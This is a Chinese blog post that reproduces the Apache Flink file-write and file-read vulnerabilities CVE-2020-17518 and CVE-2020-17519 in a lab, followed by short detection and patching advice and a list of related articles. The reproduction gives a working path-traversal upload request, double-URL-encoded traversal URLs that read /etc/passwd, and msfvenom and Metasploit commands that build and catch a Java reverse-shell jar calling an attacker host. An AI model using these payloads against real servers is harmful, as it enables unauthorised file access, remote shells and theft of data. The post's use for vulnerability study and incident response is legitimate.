Flink任意文件读写漏洞复现及排查

最新推荐文章于 2024-06-20 17:07:48 发布
最新推荐文章于 2024-06-20 17:07:48 发布
阅读量288 收藏
点赞数
分类专栏: 应急响应 渗透 文章标签: flink 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/youuzi/article/details/132272970
版权

目录

概述

影响版本

漏洞复现

CVE-2020-17518(任意文件写入)

CVE-2020-17519(任意文件读取)

应急排查

修复建议

概述

Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。此外,Flink的运行时本身也支持迭代算法的执行。

Apache Flink的数据流编程模型在有限和无限数据集上提供单次事件(event-at-a-time)处理。在基础层面,Flink程序由流和转换组成。

Apache Flink的API:有界或无界数据流的数据流API、用于有界数据集的数据集API、表API

Apache Flink组件存在文件写入与任意文件读取漏洞的信息,漏洞编号:(CVE-2020-17518/CVE-2020-17519),漏洞:高危。该漏洞是由于Apache Flink 在受影响版本引入不安全的REST API接口,攻击者可利用漏洞在未授权的情况下,构造恶意数据执行任意文件读取或文件写入攻击,最终获取服务器敏感性信息或权限。

影响版本

CVE-2020-17518
Apache:Apache Flink: 1.5.1 – 1.11.2

CVE-2020-17519
Apache:Apache Flink: 1.11.0, 1.11.1, 1.11.2

漏洞复现

CVE-2020-17518(任意文件写入)

任意文件写入触发类是 org.apache.flink.runtime.rest.FileUploadHandler, 该类调用发生在路由解析之前, 而且filename可控

DiskFileUpload fileUpload = (DiskFileUpload)data;
Preconditions.checkState(fileUpload.isCompleted());
Path dest = this.currentUploadDir.resolve(fileUpload.getFilename());
fileUpload.renameTo(dest.toFile());
LOG.trace("Upload of file {} complete.", fileUpload.getFilename());DiskFileUpload fileUpload = (DiskFileUpload)data;
Preconditions.checkState(fileUpload.isCompleted());
Path dest = this.currentUploadDir.resolve(fileUpload.getFilename());
fileUpload.renameTo(dest.toFile());
LOG.trace("Upload of file {} complete.", fileUpload.getFilename());

fileUpload 会先在 /tmp 目录下缓存文件, 然后再通过 filename 将文件移动. 所以构造 poc 如下:

POST /jars/upload HTTP/1.1
Host: 192.168.52.131:8081
Content-Length: 215
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarympYOdlJgzW23M7xi
Origin: http://192.168.52.131:8081
Referer: http://192.168.52.131:8081/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: experimentation_subject_id=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklqVTBaVGd3WlRCbExXTXdaV0l0TkRJeFpTMDVPRFl3TFRRMFpqZ3hObVF4WmpkbU1pST0iLCJleHAiOm51bGwsInB1ciI6ImNvb2tpZS5leHBlcmltZW50YXRpb25fc3ViamVjdF9pZCJ9fQ%3D%3D--f48c6e729d1a83e5acdd4acbdabdbd041b684e84
Connection: close

------WebKitFormBoundarympYOdlJgzW23M7xi
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/test2.txt"
Content-Type: text/plain

1111
------WebKitFormBoundarympYOdlJgzW23M7xi--

 虽然回复400,但实际已经上传成功

 

如何获取获取shell?

Flink 本身是没有鉴权的,并且它本身支持任意jar包上传并执行,所以可以通过上传jar包getshell。

使用msf生成反弹shell的jar包

msfvenom -p java/shell_reverse_tcp lhost=192.168.52.133  lport=12345 -f jar >/home/a.jar

启用msf接受shell

msfconsole
use exploit/multi/handler
set payload java/shell_reverse_tcp
set LHOST 192.168.52.133
set LPORT 12345
exploit

 

在Apache Flink中选择Add New,选择木马jar文件上传,点击刚刚上传的木马文件,选择submit

 我这里提交后一直报错,太菜了,没找到原因,getshell失败

 

CVE-2020-17519(任意文件读取)

利用方式:url经过两次url编码

http://ip:8081/v1/jobmanager/logs/..%252f..%252f..%252f..%252fetc%252fpasswd
http://ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252fetc%252fpasswd

 

 

应急排查

1、web访问日志类

如果害搭建又其他web服务,且存在中间件,可查看访问日志,查看”jobmanager“和“/jars/upload”关键字

2、flink本身日志

这里的话可作为辅助参考,会记录flink运行时的一些info或告警信息。

 

 

修复建议

官方已发布安全版本,请及时下载升级至安全版本
Downloads | Apache Flink

dayouziei
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【CVE】CVE-2020-17518 & CVE-2020-17519:Flink 任意文件上传 & 未授权访问
边扯边淡
05-09 2555
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518 和 CVE-2020-17519 在 Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 & 未授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
Apache Flink未授权访问-远程代码命令执行-复现
thelostworld
10-24 631
​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现。Apache Flink未授权访问-远程代码命令执行-复现一、漏洞简介Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过未授权的Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。二、影响版本Apache Flink &...
Apache Flink漏洞复现
最新发布
YJ_12340的博客
06-20 1076
Apache Flink 是高效和分布式的通用数据处理平台,由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎(简单来说,就是跟spark类似)。Flink 具有监控 API,可用于查询"正在运行的jobs" 和 "最近完成的jobs" 的状态和统计信息。该监控 API 被用于 Flink 自己的dashboard,同时也可用于自定义监控工具,默认监听在8081端口。
未授权访问漏洞合集
m0_49420271的博客
07-24 1054
未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
Apache Flink文件上传漏洞(CVE-2020-17518)漏洞复现分析
SmileAssassn的博客
01-08 565
Apache Flink文件上传漏洞(CVE-2020-17518)漏洞复现分析
flamelu#Vulnerability-1#CVE-2020-17518 Apache Flink 任意文件写入1
07-25
CVE-2020-17518 Apache Flink 任意文件写入影响范围。
flink新版本bat启动文件.zip
12-11
本文将围绕“flink新版本bat启动文件.zip”这一主题,详细阐述Flink的启动过程,以及如何在新版本中解决bin目录下缺少bat启动文件的问题。 在Flink的早期版本中,通常会在`bin`目录下提供`.bat`文件,以供Windows...
Apache Flink任意文件读取(CVE-2020-17519)
m0_65150886的博客
01-29 236
Apache Flink 功能强大,支持开发和运行多种不同种类的应用程序。它的主要特性包括:批流一体化、精密的状态管理、事件时间支持以及精确一次的状态一致性保障等。Flink不仅可以运行在包括YARN、Mesos、Kubernetes在内的多种资源管理框架上,还支持在裸机集群上独立部署。事实证明,Flink已经可以扩展到数千核心,其状态可以达到TB级别,且仍能保持高吞吐、低延迟的特性。Apache Flink 是一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。
Apache Flink RCE 漏洞复现
weixin_44508748的博客
11-24 702
介绍 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。 测试环境:Flink 1.9.1 java8+。Apache Flink 1.9.1安装包下载 https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1
flink异常合集
weixin_43644153的博客
03-11 2303
1_配置文件冲突 用flink写了一个很简单的wordCount,打包扔到集群上运行,报如下错误: The program finished with the following exception: org.apache.flink.client.program.ProgramInvocationException: Job failed. (JobID: 01007136fdd759585e...
漏洞复现】Grafana任意文件读取漏洞(CVE-2021-43798)
热门推荐
qq_45244158的博客
12-09 1万+
Grafana 任意文件读取漏洞复现(CVE-2021-43798)
Apache-Solr 任意文件读取漏洞复现
不想当脚本小子的脚本小子
03-20 668
2021.3.18新出的,无CVE编号 Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果 一、漏洞描述 Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文.
泛微云桥任意文件读取漏洞复现[09/18]
weixin_39811856的博客
09-18 1371
1.老规矩,搜寻目标机器(xpath用起来确实很方便) 2.根据网上的POC试试: GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 User-Agent: curl/7.29.0 Host: xxxxx Accept: */* 3.根据收集到的IP,手动是真滴麻烦,写个小脚本再筛选一遍: 发现这个好像有戏,没有/etc/passwd,并且还是
Tomcat-Ajp协议任意文件读取漏洞复现(CVE-2020-1938)
1匹黑马
02-22 6647
文章目录影响版本危害漏洞原理漏洞复现修复建议 影响版本 Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0.100 Apache Tomcat 6.x 危害 文件包含 命令执行 漏洞原理 Apache Tomcat服务器通过Connector连接器组件与客户程序建立连接,被...
Apache Flink任意文件读取和远程文件写入漏洞
谢公子的博客
01-14 1708
目录 漏洞描述 漏洞影响版本 漏洞复现 任意文件读取 任意文件写入 修复建议 漏洞描述 Flink 在 1.5.1 版本中引入了一个 REST handler,这允许攻击者将已上传的文件写入本地任意位置的文件中,并且可通过恶意修改的 HTTP 头将这些文件写入到 Flink 1.5.1 可以访问的任意位置。 Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口使用 ../../ 进...
Apache Flink -任意文件写入漏洞(CVE-2020-17518)
chaojixiaojingang
01-07 4114
1.漏洞描述 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置。 2.影响版本 1.5.1-1.11.2 3.环境搭建 1)漏洞环境在docker中搭建,进入vulhub/flink/CVE-2020-17518目录 docker-compose up-d 2)访问http://192.168.210.227:80...
apache flink文件上传漏洞修复
05-20
Apache Flink是一个分布式流处理框架,从版本1.0.0到1.4.0存在文件上传漏洞,攻击者可以通过该漏洞上传恶意文件并在服务器上执行任意代码,造成严重的安全风险。以下是修复该漏洞的步骤: 1.升级Apache Flink版本至1.4.1及以上版本,因为该版本已经修复了文件上传漏洞。 2.移除flink-runtime-web模块,因为该模块是漏洞的根源。可以通过修改pom.xml文件中的依赖关系来实现该操作。 3.禁用FlinkWeb UI界面,因为该界面是攻击者上传恶意文件的入口。可以通过修改conf/flink-conf.yaml文件中的配置来实现该操作,具体内容如下: ``` #disable flink web ui web.submit.enable: false ``` 4.限制Flink集群的访问权限,防止未授权的用户上传恶意文件。可以通过修改conf/flink-conf.yaml文件中的配置来实现该操作,具体内容如下: ``` #set flink rest api host and port rest.address: 127.0.0.1 rest.port: 8081 #set flink jobmanager rpc address and port jobmanager.rpc.address: 127.0.0.1 jobmanager.rpc.port: 6123 ``` 以上是修复Apache Flink文件上传漏洞的步骤,建议尽快采取措施以保证系统安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值